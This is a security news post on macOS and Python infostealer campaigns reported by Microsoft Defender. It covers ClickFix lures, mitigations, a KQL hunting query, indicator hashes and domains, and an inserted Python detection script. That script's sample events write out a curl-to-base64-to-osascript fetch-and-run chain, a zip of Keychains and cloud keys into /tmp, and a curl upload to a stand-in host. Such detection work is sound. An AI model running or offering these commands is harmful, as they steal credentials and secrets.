
Since late 2025, Microsoft Defender Experts have spotted macOS campaigns that use fake sites, ClickFix tricks, and malicious DMG files.
These drop stealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). The malware runs filelessly, abuses built-in macOS tools, and grabs browser data, keychains, and developer secrets via AppleScript.
Python stealers help attackers tweak code quickly for any OS. Others hijack WhatsApp and PDF tools to push malware like Eternidade Stealer, targeting bank logins and crypto wallets. Stolen info leads to account hacks, money loss, and business breaches.
macOS Tricks, Python Phishing, and App Abuse
Mac users face fake Google Ads and sites pushing bad downloads or Terminal commands. ClickFix scams make victims paste code that installs DigitStealer (via fake DynamicLake apps), MacSync (Terminal pastes), or AMOS (AI tool fakes).
All three snag browser passwords, crypto wallets, cloud keys, and dev tokens, then zip and send data to attacker servers before cleanup.
Python stealers like PXA surged in 2025, tied to Vietnamese actors hitting governments via phishing. They use Telegram for C2, obfuscated scripts, DLL sideloading, and fake svchost.exe processes.
Campaigns in October and December established persistence with Run keys or scheduled tasks and exfiltrated data via Telegram.
Attackers abuse WhatsApp for worm-like spread. A November 2025 campaign starts with VBS dropping batch files and PowerShell.
It grabs contacts, sends bad messages, and drops Eternidade Stealer via MSI. This Delphi tool watches for bank sites like Bradesco, Binance, and MetaMask.
A September Crystal PDF scam used malvertising. The fake editor sets scheduled tasks, steals Chrome/Firefox cookies and sessions from AppData.
Mitigations, Detections, and IOCs
Block these with user training on fake installers and Terminal risks. Watch Terminal for curl, base64, gunzip, osascript. Flag Keychain access, ZIPs in /tmp, odd POSTs to new domains.
Use Microsoft Defender XDR: cloud protection, EDR block mode, network/web guards, SmartScreen, auto-remediation, tamper protection. Attack surface rules block obfuscated scripts, untrusted executables, JS/VBS downloads.
Defender spots execution (PowerShell curls, osascript), persistence (Run keys, LaunchAgents), evasion (DLL side-loading, certutil), credential grabs, discovery (WMI/Python), C2, collection (ZIPs), exfil (curl).
Hunt with queries like these for DigitStealer:
```kql
// Suspicious DMG mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'
```
Similar KQL queries cover MacSync curls, AMOS mounts, PXA svchost.exe, WhatsApp VBS drops, and CrystalPDF scheduled tasks.
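As an added illustration (not code from the post or from Microsoft), the DigitStealer hunt above and the other behaviours the mitigation section lists (Terminal curl|base64|gunzip|osascript chains, Keychain access, ZIPs staged in /tmp, curl uploads) expressed as Python rules run over constructed process events. Column names mirror the DeviceProcessEvents schema; the events, paths and the domain example.invalid are all constructed.

```python
import re

# Constructed demo, not the post's code. Column names mirror DeviceProcessEvents.
# rule -> (process names it applies to, or None for any; regexes that must ALL match)
RULES = {
    # Same logic as the KQL above: DMG mounted nodev+quarantine into the fake installer volume.
    "suspicious_dmg_mount": ({"mount_hfs", "mount"},
        [r"-o\s+nodev", r"-o\s+quarantine", r"/Volumes/Install DynamicLake"]),
    # ClickFix paste: a shell running curl piped into base64/gunzip/osascript.
    "clickfix_terminal_chain": ({"bash", "zsh", "sh"},
        [r"\bcurl\b", r"\b(base64|gunzip|osascript)\b"]),
    # Keychain access by any process, by path or `security` subcommand.
    "keychain_access": (None,
        [r"Library/Keychains|dump-keychain|find-(generic|internet)-password"]),
    # Collection: archive staged under /tmp before exfiltration.
    "tmp_zip_staging": ({"zip", "ditto"}, [r"/tmp/\S*\.zip"]),
    # Exfiltration: curl invoked with a POST/upload option (case-sensitive on purpose).
    "curl_upload": ({"curl"}, [r"-X\s*POST|--data|-d\s|-F\s|-T\s|--upload-file"]),
}

def match_rules(event):
    """Return the names of every rule this process event satisfies."""
    name, cmd = event.get("FileName", ""), event.get("ProcessCommandLine", "")
    return [rule for rule, (procs, patterns) in RULES.items()
            if (procs is None or name in procs)
            and all(re.search(p, cmd) for p in patterns)]

def hunt(events):
    """Map ReportId -> triggered rules for every event that tripped at least one."""
    return {e["ReportId"]: hits for e in events if (hits := match_rules(e))}

# Constructed telemetry: four stealer-like events (1-4) and two benign ones (5-6).
SAMPLE_EVENTS = [
    {"ReportId": 1, "FileName": "mount_hfs", "ProcessCommandLine":
     "mount_hfs -o nodev -o quarantine /dev/disk4s2 /Volumes/Install DynamicLake"},
    {"ReportId": 2, "FileName": "bash", "ProcessCommandLine":
     'bash -c "curl -fsSL https://example.invalid/p | base64 -d | gunzip | osascript"'},
    {"ReportId": 3, "FileName": "zip", "ProcessCommandLine":
     "zip -r /tmp/out.zip /Users/dev/Library/Keychains /Users/dev/.aws"},
    {"ReportId": 4, "FileName": "curl", "ProcessCommandLine":
     "curl -F file=@/tmp/out.zip https://example.invalid/upload"},
    {"ReportId": 5, "FileName": "curl", "ProcessCommandLine":
     "curl -fsSL https://example.invalid/index.html -o index.html"},
    {"ReportId": 6, "FileName": "mount", "ProcessCommandLine":
     "mount -t apfs /dev/disk3s1 /Volumes/Data"},
]
```

Running hunt(SAMPLE_EVENTS) flags events 1 to 4 (event 3 trips both the Keychain and /tmp ZIP rules) and stays silent on the benign download and mount in 5 and 6.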
Key IOCs (samples):
| Indicator | Type | Description |
|---|---|---|
| 3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a | SHA-256 | DigitStealer payload |
| 42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417 | SHA-256 | AMOS payload |
| 2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f | SHA-256 | WhatsApp campaign |
| 598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb | SHA-256 | Crystal PDF payload |
| dynamiclake[.]org | Domain | DigitStealer delivery |
| barbermoo[.]coupons | Domain | MacSync C2 |
| alli-ai[.]pro | Domain | AMOS redirect |
| bagumedios[.]cloud | Domain | PXA C2 |
Check Threat Analytics for MacSync and Crystal PDF intel. Organizations should scan now, as these cross-platform stealers blend in and evade older defenses.
The post macOS Targeted as Infostealer Attacks Abuse Python and Trusted Services appeared first on Cyber Security News.
